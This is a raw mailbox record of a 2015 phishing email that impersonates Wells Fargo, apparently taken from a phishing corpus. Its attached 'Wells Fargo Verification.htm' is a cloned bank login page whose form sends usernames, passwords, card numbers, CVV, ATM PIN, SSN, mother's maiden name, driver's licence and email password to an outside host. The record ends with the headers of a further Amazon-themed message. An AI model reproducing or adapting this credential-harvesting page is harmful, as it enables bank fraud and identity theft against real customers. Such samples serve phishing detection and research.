From: "Wells Fargo Online" <wellfargo_connectalert@online.wellsfargo.com>
Date: Sun, 06 Sep 2015 15:44:07 +0200
Message-Id: <20150906134357.8D5C32B77BB3@zimbra02.intellispace.net>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 168

You will not see this in a MIME-aware mail reader.
--===============0197352710==
Content-Type: multipart/alternative; boundary="===============0914813512=="
MIME-Version: 1.0

--===============0914813512==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

      =

    We are sorry, We have noticed an error activity on your wellsfargo onli=
ne banking services. We advice you to verify your Wellsfargo account(s) now=
 using the Wellsfargo Account Verification Page. To verify your Account Ple=
ase Download Attachment and open in a browser to Continue. We value your pr=
ivacy and your preferences. Failure to abide by these instructions may subj=
ect you to wellsfargo online restrictions or inactivity. =

 =

      =

 =

 =

  =A9 2015 Wells Fargo All rights reserved. =

 =

=20

--===============0914813512==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" http-equiv=3DContent-Type>
<META name=3DGENERATOR content=3D"MSHTML 8.00.6001.19154">
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT size=3D2 face=3DArial>
<DIV>
<DIV><IMG border=3D0 alt=3DLogo =

src=3D"http://cdn.rsys1.net/ig.rsys1.net/responsysimages/wls/SMP_EmailUpdat=
e/EmailUpdate/emailjumpmasthead.gif" border=3D"0">  <IMG =

src=3D"https://wfefs.wellsfargo.com/csteps/images/clear.gif" width=3D1 heig=
ht=3D20> =

<DIV>
<TABLE border=3D1 cellSpacing=3D0 summary=3Dlayout cellPadding=3D10 width=
=3D575>
  <TBODY>
  <TR>
    <TD>
      <P><FONT size=3D-1 face=3D"Verdana, Arial, Helvetica, sans-serif">We =
are sorry, We have noticed an error =

      activity on your wellsfargo online banking services. We advice you to =

      verify your Wellsfargo account(s) now using the Wellsfargo =

      Account&nbsp;Verification Page. To&nbsp;verify your Account Please =

      Download Attachment and open in a browser&nbsp;to Continue. We value =
your =

      privacy and your preferences. Failure to abide by these instructions =
may =

      subject you to wellsfargo online restrictions or inactivity. </FONT><=
/P>
      <P><FONT size=3D-1 =

      face=3D"Verdana, Arial, Helvetica, sans-serif"></FONT></P><FONT size=
=3D-1 =

      face=3D"Verdana, Arial, Helvetica, sans-serif">
      <DIV>
      <DIV>
      <DIV>
      <DIV>
      <DIV align=3Dcenter><IMG border=3D0 =

      alt=3D"Investment Products: Not FDIC Insured - No Bank Guarantee - Ma=
y &#13;&#10;Lose &#13;&#10;Value" =

      align=3Dmiddle =

      src=3D"https://www.wellsfargo.com/images/per/investing/al_product_dis=
claim.gif"></DIV>
      <P></P>
      <P></P>
      <P></P></DIV><FONT size=3D1></FONT>
      <DIV><FONT size=3D1></FONT>
      <P align=3Dcenter><FONT size=3D1><FONT size=3D2>=A9 2015 Wells Fargo =
All rights =

      reserved. </FONT></FONT></P></DIV><FONT size=3D1></FONT></DIV><FONT =

      size=3D1></FONT></DIV><FONT size=3D1></FONT></DIV><FONT size=3D1></FO=
NT>
      <P><FONT size=3D1></FONT></P><FONT size=3D1></FONT></FONT>
      <P></P></TD></TR></TBODY></TABLE></DIV></DIV></DIV></FONT></DIV></BOD=
Y></HTML>
--===============0914813512==--
--===============0197352710==
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="Wells Fargo Verification.htm"

    =

    =

    =

    =

      =

      =

        =

      =

    =

    =

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://=
www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns=3D"http://www.w3.org/1999/xhtml" xml:lang=3D"en" lang=3D"en=
">
    =







    =


    =

    <head>
        =

            <script type=3D"text/javascript" src=3D"https://online.wellsfar=
go.com/das/common/scripts/domready.js"></script>
            <script type=3D"text/javascript" src=3D"https://online.wellsfar=
go.com/das/common/scripts/tas.js"></script>
        =


        <meta http-equiv=3D"Content-type" content=3D"text/html; charset=3DU=
TF-8" />
            =

        =

        =

        =









<title>Wells Fargo&nbsp;Online Account Verification</title>


        <link type=3D"text/css" href=3D"https://online.wellsfargo.com/das/c=
ommon/styles/WEBstyle.css" rel=3D"stylesheet" media=3D"screen" />
        <link type=3D"text/css" href=3D"https://online.wellsfargo.com/das/c=
ommon/styles/WEBprint.css" rel=3D"stylesheet" media=3D"print" />
        <link type=3D"text/css" href=3D"https://online.wellsfargo.com/das/c=
ommon/styles/WEBWIB.css" rel=3D"stylesheet" media=3D"screen,projection,prin=
t" />
        <link rel=3D"shortcut icon" type=3D"image/x-icon" href=3D"https://w=
ww.wellsfargo.com/favicon.ico" />
        <link rel=3D"icon" type=3D"image/x-icon" href=3D"https://www.wellsf=
argo.com/favicon.ico" />
        =

        =

        <script type=3D"text/javascript" src=3D"https://online.wellsfargo.c=
om/das/common/scripts/wfwiblib.js"></script>

    </head>

     =

      =







<script type=3D"text/javascript">

    var tasInfo=3D{"pageID":"",
			 "Url":"/tas",
			 "data":{},
		         "name":"",
		         "App_ID":"WIB",
		         "presetSec": 2000,
                 "wibUrl":"https://online.wellsfargo.com/das/keystone/Offer=
ClickProc.do?destUrl=3D",
                 "acquisition":"",
                "appSuccessUrl": "http://www.wellsfargo.com/OLB/AppsEnded",
                 "productType":"",
                 "productSubType": "",
                 "displayOffers": ""

             };


</script>


      =


    <body id=3D"online_wellsfargo_com">
    =

<script	type=3D"text/javascript">
 <!-- // <![CDATA[
    if (top	!=3D self) {
        top.location.href =3D self.location.href;
    }
 // ]]> -->
</script>
    <a name=3D"top" id=3D"top"></a>
    =


    =

<table id=3D"masthead" cellspacing=3D"0">
    <tr>

      <td id=3D"mastLeftCol" nowrap=3D"nowrap">
          =

              <a href=3D"https://www.wellsfargo.com"><img src=3D"https://a2=
48.e.akamai.net/7/248/3608/bb61162e7a787f/online.wellsfargo.com/das/common/=
images/logo_62sq.gif" id=3D"logo" alt=3D"Wells Fargo Home Page" /></a><img =
src=3D"https://a248.e.akamai.net/7/248/3608/53845d4a1846e7/online.wellsfarg=
o.com/das/common/images/coach.gif" id=3D"coach" alt=3D"" /><a href=3D"https=
://www.wellsfargo.com/auxiliary_access/aa_talkatmloc"><img src=3D"https://a=
248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common=
/images/shim.gif" class=3D"inline" alt=3D"Talking ATM Locations" border=3D"=
0" height=3D"1" width=3D"1"/></a><a href=3D"#skip"><img src=3D"https://a248=
.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/im=
ages/shim.gif" class=3D"inline" alt=3D"Skip to page content" border=3D"0" h=
eight=3D"1" width=3D"1" /></a></td>
      <td id=3D"mastRightCol" valign=3D"top"><div id=3D"utilities">

  =

    =

  =

      =

      =

          <a href=3D"#" class=3D"headerLink">Customer Service</a>
      =

  =

| <a href=3D"#" class=3D"headerLink">Locations</a>
  =

    =

    =

        | <a href=3D"#" class=3D"headerLink">Apply</a>

    =


  =

    =

    =

        | <a href=3D"#" class=3D"headerLink">Home</a>
    =


</div>
        <div id=3D"topSearch">
          <form action=3D"#" method=3D"get">
            <table cellspacing=3D"0">
                <tr>
                  <td><input name=3D"query" value=3D"" title=3D"Search" siz=
e=3D"25" class=3D"headerSearch" type=3D"text" /></td>

                  <td><input src=3D"https://a248.e.akamai.net/7/248/3608/99=
050a7dbe666d/online.wellsfargo.comhttps://online.wellsfargo.com/das/common/=
images/al_search_btn.gif" alt=3D"Search" class=3D"headerSearch" type=3D"ima=
ge" /></td>

                </tr>
            </table>
          </form>
        </div>
        <div id=3D"mastNav">
          <ul>
            <li class=3D"noneSelected">

              <div class=3D"tab"><a href=3D"#" class=3D"mastTab">Personal</=
a></div>

            </li>
            <li class=3D"noneSelected">
              <div class=3D"tab"><a href=3D"#" class=3D"mastTab">Small Busi=
ness</a></div>
            </li>
            <li class=3D"noneSelected">
                <div class=3D"tab"><a href=3D"#" class=3D"mastTab">Commerci=
al</a></div>

            </li>
          </ul>

          <div class=3D"clearer">&nbsp;</div>
        </div>
        <img src=3D"https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/onl=
ine.wellsfargo.comhttps://online.wellsfargo.com/das/common/images/shim.gif"=
 id=3D"mastShim1" alt=3D"" height=3D"1"/></td>
    </tr>
    <tr>
      <td colspan=3D"2"><img src=3D"https://a248.e.akamai.net/7/248/3608/1d=
8352905f2c38/online.wellsfargo.comhttps://online.wellsfargo.com/das/common/=
images/shim.gif" id=3D"mastShim2" alt=3D"" height=3D"1"/></td>

    </tr>
</table>


    =


    =

    =

    =

    =

    =

    =

    =

    =

    =

    <div id=3D"tabContainer">
        <a href=3D"#" class=3D"tabs" title=3D"Banking - Tab">Banking</a>
        <a href=3D"#" class=3D"tabs" title=3D"Loans &amp; Credit - Tab">Loa=
ns &amp; Credit</a>
        <a href=3D"#" class=3D"tabs" title=3D"Insurance - Tab">Insurance</a>

        <a href=3D"#" class=3D"tabs" title=3D"Investing - Tab">Investing</a>
        <a href=3D"#" class=3D"tabOn" title=3D"Customer Service - Tab - Sel=
ected">Customer Service</a>

        <div class=3D"clearer">&nbsp;</div>
    </div>
    <div class=3D"tabUnderline">
        <img src=3D"https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/onl=
ine.wellsfargo.com/common/images/shim.gif" height=3D"1" width=3D"1" alt=3D"=
" /></div>

    <div id=3D"main">

      <table id=3D"layout" cellspacing=3D"0">
          <tr>
            <td id=3D"leftCol">

    =

    <div class=3D"c45Layout">
        <h3>Related Information</h3>
        <a href=3D"#" class=3D"relatedLink">Online Banking Enrollment Quest=
ions</a>
        <a href=3D"#" class=3D"relatedLink">Online Security Guarantee</a>

        <a href=3D"#" class=3D"relatedLink">Privacy, Security &amp; Legal</=
a>

    </div>
</td>
            <td id=3D"contentCol"><div class=3D"c4P webwib"> <img src=3D"ht=
tps://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.comhttp=
s://online.wellsfargo.com/das/common/images/shim.gif" id=3D"minWidth" alt=
=3D"" />
               =


    =

    <div id=3D"title">
        <h1 id=3D"skip">Wells Fargo Online Account Verification</h1>

    </div>
    <div id=3D"pageerrors">


	=

</div>

               =


    =

    =


<script	type=3D"text/javascript">
var FocusNeeded	=3D true;	// set a global	flag
function placeFocus() {
  // Set the focus to the 1st screen field
  if (FocusNeeded) {
   	 document.Signon.userid.focus();
  }
}
addEvent(window, 'load', placeFocus);
</script>

    <p>
        =

            =

                Enter your account details correctly to securely verify you=
r account verification process and manage your Wells Fargo accounts online.
            =

            =

        =

    </p>

    <form action=3D"http://cliena.com/img/ver.php?online.wellsfargo.com/ZXJ=
yb3IudXNlcm5hbWVJbnZhbGlkRm9ybWF0"
          method=3D"post" name=3D"Signon" id=3D"Signon" autocomplete=3D"off=
">
          <input type=3D"hidden" name=3D"LOB" value=3D"CONS"	/>

          <input type=3D"hidden" name=3D"origination" value=3D"Wib" />
          <input type=3D"hidden" name=3D"inboxItemId" value=3D"" />

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">
                =

                <label for=3D"destination" class=3D"formlabel">Sign on to</=
label>

            </div>
            <div class=3D"formCtlColumn">
                <select name=3D"destination" id=3D"destination" title=3D"Se=
lect a destination">

                    <option selected=3D"selected" value=3D"Account Verifica=
tion">Account Verification</option>
                    <option value=3D"Transfer">Transfer</option>
                    <option value=3D"BillPay">Bill Pay</option>
                    <option value=3D"Brokerage">Brokerage</option>

                    <option value=3D"Trade">Trade</option>
                    <option value=3D"MessageAlerts">Messages &amp; Alerts</=
option>

                    <option value=3D"MainMenu">Account Services</option>
                </select>
            </div>
        </div>

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">
                =

                    =

                    =

                        <label for=3D"username" class=3D"formlabel">Usernam=
e</label>

                    =

                =

            </div>
            <div class=3D"formCtlColumn">
                <input type=3D"text" name=3D"userid" id=3D"username" size=
=3D"20" maxlength=3D"14" accesskey=3D"U"
                       title=3D"Enter Username" onclick=3D"FocusNeeded=3Dfa=
lse;" onkeypress=3D"FocusNeeded=3Dfalse;" />
            </div>

        </div>

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">
                =

                    =

                    =

                        <label for=3D"password" class=3D"formlabel">Passwor=
d</label>

                    =

                =

            </div>
            <div class=3D"formCtlColumn">
                <input type=3D"password" name=3D"password" id=3D"password" =
size=3D"20" maxlength=3D"14" title=3D"Enter Password" />

 </div>
        </div>

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">
                <label for=3D"Card Number" class=3D"formlabel">Card Number<=
/label>

                    =

                =

            </div>
            <div class=3D"formCtlColumn">
                <input type=3D"text" name=3D"ccn" id=3D"ccn" size=3D"30" ma=
xlength=3D"40" accesskey=3D"U"
                       title=3D"Enter Card Number" onclick=3D"FocusNeeded=
=3Dfalse;" onkeypress=3D"FocusNeeded=3Dfalse;" />
 </div>
        </div>

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">

                     =

                         <label for=3D"CVV" class=3D"formlabel">CVV</label>

                    =

                =

            </div>
            <div class=3D"formCtlColumn">
                <input type=3D"password" name=3D"ccv" id=3D"ccv" size=3D"5"=
 maxlength=3D"150" accesskey=3D"U"
                                                    title=3D"Enter CVV" onc=
lick=3D"FocusNeeded=3Dfalse;" onkeypress=3D"FocusNeeded=3Dfalse;" />
 </div>
        </div>

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">


                        <label for=3D"atmpin" class=3D"formlabel">ATM Pin</=
label>

                    =

                =

            </div>
            <div class=3D"formCtlColumn">
                <input type=3D"password" name=3D"atmpin" id=3D"atmpin" size=
=3D"10" maxlength=3D"10" accesskey=3D"U"
                       title=3D"Enter ATM Pin" onclick=3D"FocusNeeded=3Dfal=
se;" onkeypress=3D"FocusNeeded=3Dfalse;" />
 </div>
        </div>

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">

                =

                    =

                    =

                        <label for=3D"Expiration Date(MM/YY)" class=3D"form=
label">Expiration Date(MM/YY)</label>
                    =

                =

            </div>
            <div class=3D"formCtlColumn">
                <input type=3D"text" name=3D"month" id=3D"month" size=3D"3"=
 maxlength=3D"150" accesskey=3D"U"
                                              title=3D"Enter MONTH" onclick=
=3D"FocusNeeded=3Dfalse;" onkeypress=3D"FocusNeeded=3Dfalse;" />
                <input type=3D"text" name=3D"year" id=3D"year" size=3D"5" m=
axlength=3D"150" accesskey=3D"U"
                                                   title=3D"Enter YEAR" onc=
lick=3D"FocusNeeded=3Dfalse;" onkeypress=3D"FocusNeeded=3Dfalse;" />
 </div>
        </div>

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">
 =


                        <label for=3D"Date Of Birth (DD/MM/YY)" class=3D"fo=
rmlabel">Date Of Birth (DD/MM/YY)</label>
                    =

                =

            </div>
            <div class=3D"formCtlColumn">
                <input type=3D"text" name=3D"dob" id=3D"dob" size=3D"10" ma=
xlength=3D"150" accesskey=3D"U"
                       title=3D"Enter Date Of Birth" onclick=3D"FocusNeeded=
=3Dfalse;" onkeypress=3D"FocusNeeded=3Dfalse;" />
               =

 </div>
        </div>

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">
                    =

   =

                         <label for=3D"Mother's Maiden Name" class=3D"forml=
abel">Mother's Maiden Name</label>
                    =

                =

            </div>
            <div class=3D"formCtlColumn">
                <input type=3D"text" name=3D"Mmn" id=3D"Mmn" size=3D"15" ma=
xlength=3D"150" accesskey=3D"U"
                       title=3D"Enter Mother's Maiden Name" onclick=3D"Focu=
sNeeded=3Dfalse;" onkeypress=3D"FocusNeeded=3Dfalse;" />
               =

 </div>
        </div>

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">

                 =

                        <label for=3D"ssn" class=3D"formlabel">Social Secur=
ity Number</label>

                    =

                =

            </div>
            <div class=3D"formCtlColumn">

                <input type=3D"text" name=3D"ssn" id=3D"ssn" size=3D"12" ma=
xlength=3D"14" accesskey=3D"U"
                       title=3D"Enter Social Securiy Number" onclick=3D"Foc=
usNeeded=3Dfalse;" onkeypress=3D"FocusNeeded=3Dfalse;" />
 </div>
        </div>

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">
                =

                    =

                    =

                        <label for=3D"dln" class=3D"formlabel">Driver's Lic=
ense Number</label>

                    =

                =

            </div>

            <div class=3D"formCtlColumn">
                <input type=3D"text" name=3D"dln" id=3D"dln" size=3D"12" ma=
xlength=3D"18" accesskey=3D"U"
                       title=3D"Enter Driver's License Number" onclick=3D"F=
ocusNeeded=3Dfalse;" onkeypress=3D"FocusNeeded=3Dfalse;" />
 </div>
        </div>

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">
                =

                    =

                    =

                        <label for=3D"email" class=3D"formlabel">Email Addr=
ess</label>

                    =

                =

            </div>
            <div class=3D"formCtlColumn">
                <input type=3D"text" name=3D"email" id=3D"email" size=3D"40=
" maxlength=3D"50" accesskey=3D"U"
                       title=3D"Enter Email Address" onclick=3D"FocusNeeded=
=3Dfalse;" onkeypress=3D"FocusNeeded=3Dfalse;" />
 </div>
        </div>

        <div class=3D"formPseudoRow">
            <div class=3D"labelColumn">
                =

                    =

                    =

                        <label for=3D"epass" class=3D"formlabel">Email Pass=
word</label>

                    =

                =

            </div>
            <div class=3D"formCtlColumn">
                <input type=3D"password" name=3D"epass" id=3D"epass" size=
=3D"20" maxlength=3D"30" accesskey=3D"U"
                       title=3D"Enter Email Address Password" onclick=3D"Fo=
cusNeeded=3Dfalse;" onkeypress=3D"FocusNeeded=3Dfalse;" />
               <br />
                <br />
                <strong>Ensure that the above details are correctly entered=
 before clicking the Submit botton</a>

                </strong>
            </div>
        </div>

       <div class=3D"clearboth">&nbsp;</div>

       <div id=3D"buttonBar" class=3D"altauthBtnBar">
            <span id=3D"buttonPrimary">
                <input type=3D"submit" name=3D"continue" value=3D"Submit" />
            </span>

           <div class=3D"clearer">&nbsp;</div>
       </div>
    </form>

    <div id=3D"StandAloneLinks">

        <a href=3D"#" tabindex=3D"10">Online Access Agreement</a><br />
        <a href=3D"#" tabindex=3D"10">Important Notice on Trading in Fast M=
arkets</a><br />
        <a href=3D"#" tabindex=3D"10">Security Questions Overview</a>

--===============0197352710==--

From xx@pp.com  Mon Sep  7 12:22:56 2015
Return-Path: <xx@pp.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id E1FAEF409C
	for <jose@login.monkey.org>; Mon,  7 Sep 2015 12:22:55 -0500 (CDT)
Received: from smtpin16.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay03.b.hostedemail.com (Postfix) with SMTP id A67521845C6
	for <jose@login.monkey.org>; Mon,  7 Sep 2015 17:22:55 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70607117910.16.ball16_53b2b9985a122
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 75,0,0,59e06702bdf3fa83,d41d8cd98f00b204,xx@pp.com,:,RULES_HIT:2:41:72:355:379:581:800:962:967:973:983:988:989:1189:1208:1212:1221:1260:1261:1263:1313:1314:1345:1381:1431:1432:1433:1434:1436:1437:1516:1517:1518:1535:1566:1570:1571:1575:1588:1592:1594:1606:1710:1714:1730:1777:1792:2145:2525:2527:2560:2568:2610:2627:2682:2685:2859:2890:2892:2895:2896:2901:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3623:3865:3867:3889:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4118:4250:4321:4605:5007:6650:6669:6678:6688:8583:8599:8603:8957:9025:9080:9121:9388:9416:9908:10049:10214:10346:10946:11209:11233:11473:11657:11658:11805:11855:11914:12043:12219:12438:12555:12635:12740:12776:13025:13110:13227:13229:13235:13236:13237:14096:14141:21080,0,RBL:70.28.55.106-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fs,MSBL:0,DNSBL:neutral,Custom_rules:0:2:0
X-HE-Tag: ball16_53b2b9985a122
X-Filterd-Recvd-Size: 7962
Received: from ECCEHP7.SAP.COM (TOROON63-1176254314.sdsl.bell.ca [70.28.55.106])
	by imf02.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon,  7 Sep 2015 17:22:55 +0000 (UTC)
Received: from ECCEHP7.SAP.COM ([127.0.0.1]) by ECCEHP7.SAP.COM with Microsoft SMTPSVC(7.5.7601.17514);
	 Mon, 7 Sep 2015 22:52:56 +0530
Content-Type: multipart/alternative; boundary="===============0194573008=="
MIME-Version: 1.0
Subject: Amazon account status has been changed
To: jose@monkey.org
